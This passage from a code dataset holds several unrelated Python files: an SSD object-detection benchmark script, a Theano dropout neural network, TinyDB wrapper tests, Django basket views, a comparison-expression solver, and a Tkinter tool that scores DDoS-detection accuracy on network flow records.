file.write(line + \"\\n\")\n\n\ndef add_time_info(times):\n # Store execution time information\n times = [round(time, 5) for time in times]\n with open(time_results, \"a\", newline=\"\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(times)\n\n\n# Load SSD\nmodel = cv2.dnn.readNet(f\"weights/{MODEL}\", f\"cfg/MobileNetSSD_V2.pbtxt\")\n\n# Check for GPU\nif args.gpu:\n model.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n model.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n\n\nprint(f\"\\n[Data] {args.data}\\n\")\nprint(f\"\\n[Loading] {MODEL}\")\nprint(f\"[Input dimensions] {INPUT_DIMENSIONS} x {INPUT_DIMENSIONS}\\n\")\n\ncounter = 1\n\n# Total execution time\nstart_time = time.time()\n\n# Run inference on each image\nfor test_image in images_list:\n print(f\"Image: ({counter}/{args.samples}) {test_image}\")\n\n # Execution time information\n frame_start_time = time.time()\n\n # Load image\n img = cv2.imread(images_path + test_image)\n\n # Make result file for this image with the same name\n name = test_image.replace(\".jpg\", \".txt\")\n detection_result_path = os.path.join(detection_results, name)\n open(detection_result_path, \"a\")\n\n height, width, channels = img.shape\n\n # Format image\n blob = cv2.dnn.blobFromImage(\n img, size=(INPUT_DIMENSIONS, INPUT_DIMENSIONS), swapRB=True, crop=False\n )\n\n # Run inference\n model.setInput(blob)\n start_inf = time.time()\n outs = model.forward()\n end_inf = time.time()\n\n # Network output information\n # Based on the code from:\n # https://github.com/opencv/opencv/wiki/TensorFlow-Object-Detection-API\n # (accessed 12/01/20)\n for detection in outs[0, 0, :, :]:\n class_id = int(detection[1])\n confidence = float(detection[2])\n if confidence > args.conf:\n # Object detected\n x1 = detection[3] * width\n y1 = detection[4] * height\n x2 = detection[5] * width\n y2 = detection[6] * height\n\n class_name = str(classes[class_id])\n # remove spaces from class names for mAP score\n class_name = class_name.replace(\" \", \"\", 1)\n line = f\"{class_name} {confidence:.6f} {x1} {y1} {x2} {y2}\"\n add_bb_info(detection_result_path, line)\n\n # Get inference time\n infer_time = end_inf - start_inf\n # print(infer_time)\n\n frame_end_time = time.time() - frame_start_time\n # Write times to 
file\n add_time_info([frame_end_time, infer_time])\n\n counter += 1\n\n\n# Time taken for code to finish\ntotal_time = time.time() - start_time\nadd_time_info([total_time])\n\nprint(f\"[Time taken] {total_time}\")\n","repo_name":"davet2408/PRJ","sub_path":"ssd_object_detection/test_on_coco.py","file_name":"test_on_coco.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28270198703","text":"\"\"\"\nA deep neural network with or w/o dropout in one file.\n\nLicense: Do What The Fuck You Want to Public License http://www.wtfpl.net/\n\"\"\"\n\nimport numpy, theano, math\nfrom theano import tensor as T\nfrom theano import shared\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom collections import OrderedDict\n\nBATCH_SIZE = 100\n\n\ndef relu_f(vec):\n \"\"\" Wrapper to quickly change the rectified linear unit function \"\"\"\n return (vec + abs(vec)) / 2.\n\n\ndef dropout(rng, x, p=0.5):\n \"\"\" Zero-out random values in x with probability p using rng \"\"\"\n if p > 0. and p < 1.:\n seed = rng.randint(2 ** 30)\n srng = theano.tensor.shared_randomstreams.RandomStreams(seed)\n mask = srng.binomial(n=1, p=1.-p, size=x.shape,\n dtype=theano.config.floatX)\n return x * mask\n return x\n\n\ndef fast_dropout(rng, x):\n \"\"\" Multiply activations by N(1,1) \"\"\"\n seed = rng.randint(2 ** 30)\n srng = RandomStreams(seed)\n mask = srng.normal(size=x.shape, avg=1., dtype=theano.config.floatX)\n return x * mask\n\n\ndef build_shared_zeros(shape, name):\n \"\"\" Builds a theano shared variable filled with a zeros numpy array \"\"\"\n return shared(value=numpy.zeros(shape, dtype=theano.config.floatX),\n name=name, borrow=True)\n\n\nclass Linear(object):\n \"\"\" Basic linear transformation layer (W.X + b) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n if W is None:\n W_values = numpy.asarray(rng.uniform(\n low=-numpy.sqrt(6. / (n_in + n_out)),\n high=numpy.sqrt(6. 
/ (n_in + n_out)),\n size=(n_in, n_out)), dtype=theano.config.floatX)\n W_values *= 4 # This works for sigmoid activated networks!\n W = theano.shared(value=W_values, name='W', borrow=True)\n if b is None:\n b = build_shared_zeros((n_out,), 'b')\n self.input = input\n self.W = W\n self.b = b\n self.params = [self.W, self.b]\n self.output = T.dot(self.input, self.W) + self.b\n if fdrop:\n self.output = fast_dropout(rng, self.output)\n\n def __repr__(self):\n return \"Linear\"\n\n\nclass SigmoidLayer(Linear):\n \"\"\" Sigmoid activation layer (sigmoid(W.X + b)) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n super(SigmoidLayer, self).__init__(rng, input, n_in, n_out, W, b)\n self.pre_activation = self.output\n if fdrop:\n self.pre_activation = fast_dropout(rng, self.pre_activation)\n self.output = T.nnet.sigmoid(self.pre_activation)\n\n\nclass ReLU(Linear):\n \"\"\" Rectified Linear Unit activation layer (max(0, W.X + b)) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n if b is None:\n b = build_shared_zeros((n_out,), 'b')\n super(ReLU, self).__init__(rng, input, n_in, n_out, W, b)\n self.pre_activation = self.output\n if fdrop:\n self.pre_activation = fast_dropout(rng, self.pre_activation)\n self.output = relu_f(self.pre_activation)\n\n\nclass DatasetMiniBatchIterator(object):\n \"\"\" Basic mini-batch iterator \"\"\"\n def __init__(self, x, y, batch_size=BATCH_SIZE, randomize=False):\n self.x = x\n self.y = y\n self.batch_size = batch_size\n self.randomize = randomize\n from sklearn.utils import check_random_state\n self.rng = check_random_state(42)\n\n def __iter__(self):\n n_samples = self.x.shape[0]\n if self.randomize:\n for _ in xrange(n_samples / BATCH_SIZE):\n if BATCH_SIZE > 1:\n i = int(self.rng.rand(1) * ((n_samples+BATCH_SIZE-1) / BATCH_SIZE))\n else:\n i = int(math.floor(self.rng.rand(1) * n_samples))\n yield (i, self.x[i*self.batch_size:(i+1)*self.batch_size],\n self.y[i*self.batch_size:(i+1)*self.batch_size])\n else:\n for i in xrange((n_samples + self.batch_size - 1)\n / self.batch_size):\n yield (self.x[i*self.batch_size:(i+1)*self.batch_size],\n self.y[i*self.batch_size:(i+1)*self.batch_size])\n\n\nclass LogisticRegression:\n \"\"\"Multi-class Logistic Regression\n \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None):\n if W != None:\n self.W = W\n else:\n self.W = build_shared_zeros((n_in, n_out), 'W')\n if b != None:\n self.b = b\n else:\n self.b = build_shared_zeros((n_out,), 'b')\n\n # P(Y|X) = softmax(W.X + b)\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\n self.output = self.y_pred\n self.params = [self.W, self.b]\n\n def negative_log_likelihood(self, y):\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n def negative_log_likelihood_sum(self, y):\n return -T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n def training_cost(self, y):\n \"\"\" Wrapper for standard name \"\"\"\n return self.negative_log_likelihood_sum(y)\n\n def errors(self, y):\n if y.ndim != self.y_pred.ndim:\n raise TypeError(\"y should have the same shape as self.y_pred\",\n (\"y\", y.type, \"y_pred\", self.y_pred.type))\n if y.dtype.startswith('int'):\n return T.mean(T.neq(self.y_pred, y))\n else:\n print(\"!!! 
y should be of int type\")\n return T.mean(T.neq(self.y_pred, numpy.asarray(y, dtype='int')))\n\n\nclass NeuralNet(object):\n \"\"\" Neural network (not regularized, without dropout) \"\"\"\n def __init__(self, numpy_rng, theano_rng=None, \n n_ins=40*3,\n layers_types=[Linear, ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[1024, 1024, 1024, 1024],\n n_outs=62 * 3,\n rho=0.9,\n eps=1.E-6,\n max_norm=0.,\n debugprint=False):\n \"\"\"\n Basic feedforward neural network.\n \"\"\"\n self.layers = []\n self.params = []\n self.n_layers = len(layers_types)\n self.layers_types = layers_types\n assert self.n_layers > 0\n self.max_norm = max_norm\n self._rho = rho # \"momentum\" for adadelta\n self._eps = eps # epsilon for adadelta\n self._accugrads = [] # for adadelta\n self._accudeltas = [] # for adadelta\n\n if theano_rng == None:\n theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n\n self.x = T.fmatrix('x')\n self.y = T.ivector('y')\n \n self.layers_ins = [n_ins] + layers_sizes\n self.layers_outs = layers_sizes + [n_outs]\n \n layer_input = self.x\n \n for layer_type, n_in, n_out in zip(layers_types,\n self.layers_ins, self.layers_outs):\n this_layer = layer_type(rng=numpy_rng,\n input=layer_input, n_in=n_in, n_out=n_out)\n assert hasattr(this_layer, 'output')\n self.params.extend(this_layer.params)\n self._accugrads.extend([build_shared_zeros(t.shape.eval(),\n 'accugrad') for t in this_layer.params])\n self._accudeltas.extend([build_shared_zeros(t.shape.eval(),\n 'accudelta') for t in this_layer.params])\n\n self.layers.append(this_layer)\n layer_input = this_layer.output\n\n assert hasattr(self.layers[-1], 'training_cost')\n assert hasattr(self.layers[-1], 'errors')\n # TODO standardize cost\n self.mean_cost = self.layers[-1].negative_log_likelihood(self.y)\n self.cost = self.layers[-1].training_cost(self.y)\n if debugprint:\n theano.printing.debugprint(self.cost)\n\n self.errors = self.layers[-1].errors(self.y)\n\n def __repr__(self):\n dimensions_layers_str = map(lambda x: \"x\".join(map(str, x)),\n zip(self.layers_ins, self.layers_outs))\n return \"_\".join(map(lambda x: \"_\".join((x[0].__name__, x[1])),\n zip(self.layers_types, dimensions_layers_str)))\n\n\n def get_SGD_trainer(self):\n \"\"\" Returns a plain SGD minibatch trainer with learning rate as param.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n learning_rate = T.dscalar('lr') # learning rate to use\n # compute the gradients with respect to the model parameters\n # using mean_cost so that the learning rate is not too dependent\n # on the batch size\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for param, gparam in zip(self.params, gparams):\n if self.max_norm:\n W = param - gparam * learning_rate\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param - gparam * learning_rate\n\n train_fn = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y),\n theano.Param(learning_rate)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n\n def get_adagrad_trainer(self):\n \"\"\" Returns an Adagrad (Duchi et al. 
2010) trainer using a learning rate.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n learning_rate = T.dscalar('lr') # learning rate to use\n # compute the gradients with respect to the model parameters\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for accugrad, param, gparam in zip(self._accugrads, self.params, gparams):\n # c.f. Algorithm 1 in the Adadelta paper (Zeiler 2012)\n agrad = accugrad + gparam * gparam\n dx = - (learning_rate / T.sqrt(agrad + self._eps)) * gparam\n if self.max_norm:\n W = param + dx\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param + dx\n updates[accugrad] = agrad\n\n train_fn = theano.function(inputs=[theano.Param(batch_x), \n theano.Param(batch_y),\n theano.Param(learning_rate)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n def get_adadelta_trainer(self):\n \"\"\" Returns an Adadelta (Zeiler 2012) trainer using self._rho and\n self._eps params.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n # compute the gradients with respect to the model parameters\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for accugrad, accudelta, param, gparam in zip(self._accugrads,\n self._accudeltas, self.params, gparams):\n # c.f. Algorithm 1 in the Adadelta paper (Zeiler 2012)\n agrad = self._rho * accugrad + (1 - self._rho) * gparam * gparam\n dx = - T.sqrt((accudelta + self._eps)\n / (agrad + self._eps)) * gparam\n updates[accudelta] = (self._rho * accudelta\n + (1 - self._rho) * dx * dx)\n if self.max_norm:\n W = param + dx\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param + dx\n updates[accugrad] = agrad\n\n train_fn = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n def score_classif(self, given_set):\n \"\"\" Returns functions to get current classification errors. 
\"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n score = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y)],\n outputs=self.errors,\n givens={self.x: batch_x, self.y: batch_y})\n\n def scoref():\n \"\"\" returned function that scans the entire set given as input \"\"\"\n return [score(batch_x, batch_y) for batch_x, batch_y in given_set]\n\n return scoref\n\n\nclass RegularizedNet(NeuralNet):\n \"\"\" Neural net with L1 and L2 regularization \"\"\"\n def __init__(self, numpy_rng, theano_rng=None,\n n_ins=100,\n layers_types=[ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[1024, 1024, 1024],\n n_outs=2,\n rho=0.9,\n eps=1.E-6,\n L1_reg=0.,\n L2_reg=0.,\n max_norm=0.,\n debugprint=False):\n \"\"\"\n Feedforward neural network with added L1 and/or L2 regularization.\n \"\"\"\n super(RegularizedNet, self).__init__(numpy_rng, theano_rng, n_ins,\n layers_types, layers_sizes, n_outs, rho, eps, max_norm,\n debugprint)\n\n L1 = shared(0.)\n for param in self.params:\n L1 += T.sum(abs(param))\n if L1_reg > 0.:\n self.cost = self.cost + L1_reg * L1\n L2 = shared(0.)\n for param in self.params:\n L2 += T.sum(param ** 2)\n if L2_reg > 0.:\n self.cost = self.cost + L2_reg * L2\n\n\nclass DropoutNet(NeuralNet):\n \"\"\" Neural net with dropout (see Hinton's et al. paper) \"\"\"\n def __init__(self, numpy_rng, theano_rng=None,\n n_ins=40*3,\n layers_types=[ReLU, ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[4000, 4000, 4000, 4000],\n dropout_rates=[0.2, 0.5, 0.5, 0.5, 0.5],\n n_outs=62 * 3,\n rho=0.9,\n eps=1.E-6,\n max_norm=0.,\n fast_drop=False,\n debugprint=False):\n \"\"\"\n Feedforward neural network with dropout regularization.\n \"\"\"\n super(DropoutNet, self).__init__(numpy_rng, theano_rng, n_ins,\n layers_types, layers_sizes, n_outs, rho, eps, max_norm,\n debugprint)\n\n self.dropout_rates = dropout_rates\n if fast_drop:\n if dropout_rates[0]:\n dropout_layer_input = fast_dropout(numpy_rng, self.x)\n else:\n dropout_layer_input = self.x\n else:\n dropout_layer_input = dropout(numpy_rng, self.x, p=dropout_rates[0])\n self.dropout_layers = []\n\n for layer, layer_type, n_in, n_out, dr in zip(self.layers,\n layers_types, self.layers_ins, self.layers_outs,\n dropout_rates[1:] + [0]): # !!! we do not dropout anything\n # from the last layer !!!\n if dr:\n if fast_drop:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W, b=layer.b, fdrop=True)\n else:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W * 1. / (1. - dr),\n b=layer.b * 1. / (1. - dr))\n # N.B. 
dropout with dr==1 does not dropanything!!\n this_layer.output = dropout(numpy_rng, this_layer.output, dr)\n else:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W, b=layer.b)\n\n assert hasattr(this_layer, 'output')\n self.dropout_layers.append(this_layer)\n dropout_layer_input = this_layer.output\n\n assert hasattr(self.layers[-1], 'training_cost')\n assert hasattr(self.layers[-1], 'errors')\n # these are the dropout costs\n self.mean_cost = self.dropout_layers[-1].negative_log_likelihood(self.y)\n self.cost = self.dropout_layers[-1].training_cost(self.y)\n\n # these is the non-dropout errors\n self.errors = self.layers[-1].errors(self.y)\n\n def __repr__(self):\n return super(DropoutNet, self).__repr__() + \"\\n\"\\\n + \"dropout rates: \" + str(self.dropout_rates)\n\n\n","repo_name":"swarbrickjones/NN_SGD","sub_path":"dnn_all.py","file_name":"dnn_all.py","file_ext":"py","file_size_in_byte":17385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10368555530","text":"import os\n\nimport pytest\nfrom tinydb import TinyDB\n\nfrom tiny_thingy import Thingy, q\n\n\n@pytest.fixture\ndef database():\n filename = \"/tmp/tiny-thingy-tests.json\"\n yield TinyDB(filename)\n os.remove(filename)\n\n\n@pytest.fixture\ndef table(request, database):\n return database.table(request.node.name)\n\n\n@pytest.fixture\ndef TestThingy(database, table):\n class TestThingy(Thingy):\n _database = database\n _table = table\n\n return TestThingy\n\n\ndef test_thingy_database(TestThingy, database):\n assert TestThingy.database == database\n\n\ndef test_thingy_table(TestThingy, table):\n assert TestThingy.table == table\n\n\ndef test_thingy_names(database):\n class Foo(Thingy):\n pass\n\n with pytest.raises(AttributeError):\n Foo.database\n\n Foo._database = database\n assert Foo.database == database\n assert Foo.table == database.table(\"foo\")\n assert Foo.table_name == \"foo\"\n\n\ndef test_table_name(table):\n class Foo(Thingy):\n _table = table\n\n assert Foo.table_name == table.name\n\n\ndef test_use_database():\n class Foo(Thingy):\n pass\n\n filename = \"/tmp/test-tiny-thingy-use-database.json\"\n Foo.use_database(filename)\n assert Foo.database is not None\n os.remove(filename)\n\n\ndef test_create(TestThingy, table):\n documents = [{\"Test\": 42}, {\"foo\": \"bar\"}, {\"baz\": \"fool\"}]\n for document in documents:\n TestThingy.create(document)\n assert table.all() == documents\n\n\ndef test_find(TestThingy, table):\n documents = [{\"id\": 42}, {\"id\": 32}, {\"id\": 13}]\n for document in documents:\n table.insert(document)\n assert len(TestThingy.find()) == 3\n assert len(TestThingy.find(q.id > 20)) == 2\n\n\ndef test_save(TestThingy, table):\n thingy = TestThingy(test=42)\n thingy.save()\n assert len(table) == 1\n thingy2 = TestThingy.find()[0]\n assert thingy2.doc_id == thingy.doc_id\n thingy.test = 101\n thingy.save()\n thingy2 = TestThingy.find()[0]\n assert thingy2.test == thingy.test\n\n\ndef test_find_one(TestThingy, table):\n assert TestThingy.find_one() is None\n TestThingy(test=42, foo=\"bar\").save()\n thingy = TestThingy.find_one()\n assert isinstance(thingy, TestThingy)\n assert thingy.test == 42\n\n\ndef test_find_one_doc_id(TestThingy):\n assert TestThingy.find_one() is None\n TestThingy().save()\n thingy = TestThingy(lol=42, foo=\"bar\").save()\n thingy = TestThingy.find_one(doc_id=thingy.doc_id)\n assert isinstance(thingy, TestThingy)\n assert thingy.lol == 42\n thingy2 
= TestThingy.find_one(q.lol == 69, doc_id=thingy.doc_id)\n assert thingy2 is None\n\n\ndef test_count(TestThingy, table):\n documents = [{\"id\": 42}, {\"id\": 32}, {\"id\": 13}]\n for document in documents:\n table.insert(document)\n assert TestThingy.count() == 3\n\n\ndef test_remove(TestThingy, table):\n TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n TestThingy.remove(q.foo == \"bar\")\n assert len(table) == 0\n\n\ndef test_inplace_update(TestThingy, table):\n TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n TestThingy.inplace_update({\"foo\": \"baz\"})\n assert len(table) == 1\n assert TestThingy.find_one().foo == \"baz\"\n\n\ndef test_delete(TestThingy, table):\n thingy = TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n thingy.delete()\n assert len(table) == 0\n","repo_name":"Shir0kamii/tiny-thingy","sub_path":"test_tiny_thingy.py","file_name":"test_tiny_thingy.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"32619772684","text":"from django.http import Http404\nfrom django.shortcuts import render, HttpResponseRedirect, get_object_or_404\nfrom basketapp.models import Basket\nfrom mainapp.models import Product\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.template.loader import render_to_string\nfrom django.http import JsonResponse\nimport json\n\n\ndef basket(request):\n title = 'Your basket'\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'title': title,\n 'basket_items': basket_items,\n }\n return render(request, 'basket.html', content)\n\n@login_required\ndef basket_add(request, pk):\n product = get_object_or_404(Product, pk=pk)\n old_basket_item = Basket.objects.filter(user=request.user, product=product)\n\n if old_basket_item:\n old_basket_item[0].quantity += 1\n old_basket_item[0].save()\n else:\n new_basket_item = Basket(user=request.user, product=product)\n new_basket_item.quantity += 1\n new_basket_item.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef basket_remove(request, pk):\n if request.method == 'POST':\n basket_record = get_object_or_404(Basket, pk=pk)\n basket_record.delete()\n print(\"request.META.get('HTTP_REFERER')\", request.META.get('HTTP_REFERER'))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n raise Http404\n\n@login_required\ndef basket_edit(request, pk, quantity):\n if request.is_ajax():\n quantity = int(quantity)\n new_basket_item = Basket.objects.get(pk=int(pk))\n\n if quantity > 0:\n new_basket_item.quantity = quantity\n new_basket_item.save()\n else:\n new_basket_item.delete()\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'basket_items': basket_items,\n }\n\n result = render_to_string('inc/record_include.html', content)\n #Сериализация моделей джанго в json\n return JsonResponse({'result': result}) #json.dump(basket.items)})\n else:\n return Http404\n\ndef basket_ajaxdelete(request, pk):\n if request.is_ajax():\n new_basket_item = Basket.objects.get(pk=int(pk))\n new_basket_item.delete()\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'basket_items': basket_items,\n }\n\n result = render_to_string('inc/record_include.html', content)\n\n return JsonResponse({'result': result})\n else:\n return 
Http404","repo_name":"towardsbackwards/Django-store","sub_path":"basketapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30843770198","text":"# C언어의 비교 연산자는 아래 표에 나와있다. \n\n# 연산자\t뜻\n# >\t크다\n# >=\t크거나 같다\n# <\t작다\n# <=\t작거나 같다\n# ==\t같다\n# !=\t같지 않다\n# 이 연산자는 두 피연산자를 비교하고, (왼쪽 값과 오른쪽 값) true또는 false (1 또는 0)을 리턴한다. 예를 들어, 2 > 3은 \"false\"를 리턴하고 (2는 3보다 작기 때문), 3 != 4는 \"true\", 3 >= 3은 \"true\"를 리턴한다.\n\n# C언어의 비교 연산식이 주어졌을 때, 결과를 구하는 프로그램을 작성하시오.\n\nimport sys\nn = 1\nwhile True:\n s = sys.stdin.readline().split()\n res = ''\n if s[1] == 'E':\n break\n if s[1] == '>=':\n if int(s[0]) >= int(s[2]):\n res += 'true'\n else:\n res += 'false'\n elif s[1] == '>':\n if int(s[0]) > int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '<=':\n if int(s[0]) <= int(s[2]):\n res += 'true'\n else:\n res += 'false'\n elif s[1] == '<':\n if int(s[0]) < int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '==':\n if int(s[0]) == int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '!=':\n if int(s[0]) != int(s[2]):\n res += 'true'\n else:\n res += 'false'\n \n print('Case '+str(n)+': '+res)\n n+=1","repo_name":"kysuk05/BJO_algo","sub_path":"브론즈/BJO5656.py","file_name":"BJO5656.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16399193897","text":"\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport csv\nimport tkinter as tk\n\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox, ttk\nimport threading\nimport time\n\n\n\n\n\ndef startevaluating(attackerIP, inputfile, outputfile):\n print(attackerIP)\n\n # load the model from disk\n path = inputfile\n #the output path file has been set to be the folder from where the input file has been received\n offlinefilepath = outputfile\n #attackerIP = \"192.168.18.82\"\n\n loaded_model = pickle.load(open(r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\LogisticRegression_Model1.sav', 'rb'))\n #data recieved from cicflowmeter is this file\n #path = r\"D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\2020-03-15_Flow.csv\"\n #path = r\"F:\\Adam\\CICflowmeter Current\\CICFlowMeter-master\\data\\daily\\2020-08-31_Flow.csv\"\n\n offlinefilepath = r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\outputfile.csv'\n\n totalflows = 1\n totalp = 1\n tp = 1\n fp = 1\n totaln = 1\n tn = 1\n fn = 1\n\n x = 0\n y = 1\n\n startscanafteriprecievedbtn[\"state\"] = \"disabled\"\n quitevaluatebtn[\"state\"] = \"normal\"\n\n while(True):\n if numberx == 1:\n setnumber(0)\n print(\"Break while\")\n break\n\n try:\n\n dataset = pd.read_csv(path, skiprows=x)\n complete_dataset = pd.read_csv(path, skiprows=x)\n\n x = x + len(dataset)\n\n\n except:\n\n print(\"File not found or bieng accessed or some error \"\n \"with original file created by cicflowmeter\")\n exit()\n\n #we have the data for analysis, now we have to analyse\n #THIS ALL IS IN WHILE LOOP\n\n #if loop if the dataset is not empty\n if len(dataset) != 0:\n\n dataset.drop(dataset.iloc[:, [0, 1, 2, 3, 5, 6, 83]], axis=1, inplace=True)\n complete_dataset.drop(complete_dataset.iloc[:, [83]], axis=1, inplace=True)\n\n #we have the data for analysis\n for i in range(len(dataset)):\n if numberx == 1:\n print(\"break for\")\n break\n Xrow = dataset.iloc[[i], 
:].values\n try:\n Y_predict = loaded_model.predict(Xrow)\n except:\n print(\"entered continue\")\n continue\n compXrow = complete_dataset.iloc[[i], :].values\n #for printing out number of rows\n #print(y)\n y = y + 1\n\n # if Y_predict == 1:\n # print(\"ALERTT!!!\")\n\n totalflows = y\n\n\n if compXrow[0, 1] == attackerIP:\n\n # count for ddos flow\n totalp = totalp + 1\n print(totalp)\n #if dataset.iloc[:, 83].values[i] == 1:\n if Y_predict == 1:\n # count for flows that are ddos and predicted 1 (right)\n tp = tp + 1\n else:\n fn = fn + 1\n\n # for normal flows\n elif compXrow[0, 1] != attackerIP:\n # count for normal flow\n totaln = totaln + 1\n if Y_predict == 0:\n # count for flows that are ddos and predicted 0 (right)\n tn = tn + 1\n else:\n fp = fp + 1\n\n Posprecision = tp / (tp + fp)\n Negprecision = tn / (tn + fn)\n\n precall = tp / (tp + fn)\n nrecall = tn / (tn + fp)\n\n Accuracy = (tp + tn) / totalflows\n Accuracyddos = tp / totalp\n Accuracynormal = tn / totaln\n\n\n\n #tv1.delete(*tv1.get_children())\n\n tv1.set(0, 'one', value=(y))\n\n tv1.set(1, 'one', value=(totalp - 1))\n tv1.set(2, 'one', value=(totaln - 1))\n\n tv1.set(3, 'one', value=(tp - 1))\n tv1.set(4, 'one', value=(tn - 1))\n tv1.set(5, 'one', value=(fp - 1))\n tv1.set(6, 'one', value=(fn - 1))\n\n tv1.set(7, 'one', value=(round(Accuracy, 2)))\n tv1.set(8, 'one', value=(round(Accuracyddos, 2)))\n tv1.set(9, 'one', value=(round(Accuracynormal, 2)))\n\n tv1.set(10, 'one', value=(round(Posprecision, 2)))\n tv1.set(11, 'one', value=(round(Negprecision, 2)))\n\n tv1.set(12, 'one', value=(round(precall, 2)))\n tv1.set(13, 'one', value=(round(nrecall, 2)))\n\n\n # enterrow(round(Accuracy, 2))\n # enterrow(round(Accuracyddos, 2))\n # enterrow(round(Accuracynormal, 2))\n #\n # enterrow(round(Posprecision, 2))\n # enterrow(round(Negprecision, 2))\n #\n # enterrow(round(precall, 2))\n # enterrow(round(nrecall, 2))\n\n #for passing complete row content to csv writer rather than the dataset where the columns 1,2,3,4 etc have been removed\n\n Xrow_without_Y = complete_dataset.iloc[[i], :].values\n Flattened_X = Xrow_without_Y.flatten()\n\n complete_Xrow_with_Y = np.append(Flattened_X, Y_predict)\n\n #Writing a CSV file for offline Analysis\n with open(offlinefilepath, 'a', newline='') as offlinefile:\n writer = csv.writer(offlinefile)\n writer.writerow(complete_Xrow_with_Y)\n\n\n # else:\n # print(\"dataset empty, sleeping for 3 seconds\")\n # time.sleep(3)\n #when while ends\n print(\"While ended\")\n windowevaluate.destroy()\n\n\n\n\n\ndef setnumber(number):\n global numberx\n numberx = number\n\nnumberx = 0\ndef setbreakevaluatecode(number):\n global numberx\n numberx = number\n\ndef quitandopenhomewindow():\n print(\"Evaluate ended\")\n setbreakevaluatecode(1)\n\n\ndef createwindowevaluationthread(inputfile, outputfile):\n\n threadwindowevaluation = threading.Thread(target=lambda: createwindowevaluation(inputfile, outputfile))\n threadwindowevaluation.start()\n\ndef gotostartevaluatingthread(attackerIP, inputfile, outputfile):\n setnumber(0)\n threadstartevaluate = threading.Thread(target=lambda: startevaluating(attackerIP, inputfile, outputfile))\n threadstartevaluate.start()\n\ndef enterrow(data):\n tv1.insert(\"\", \"end\", values=data)\n 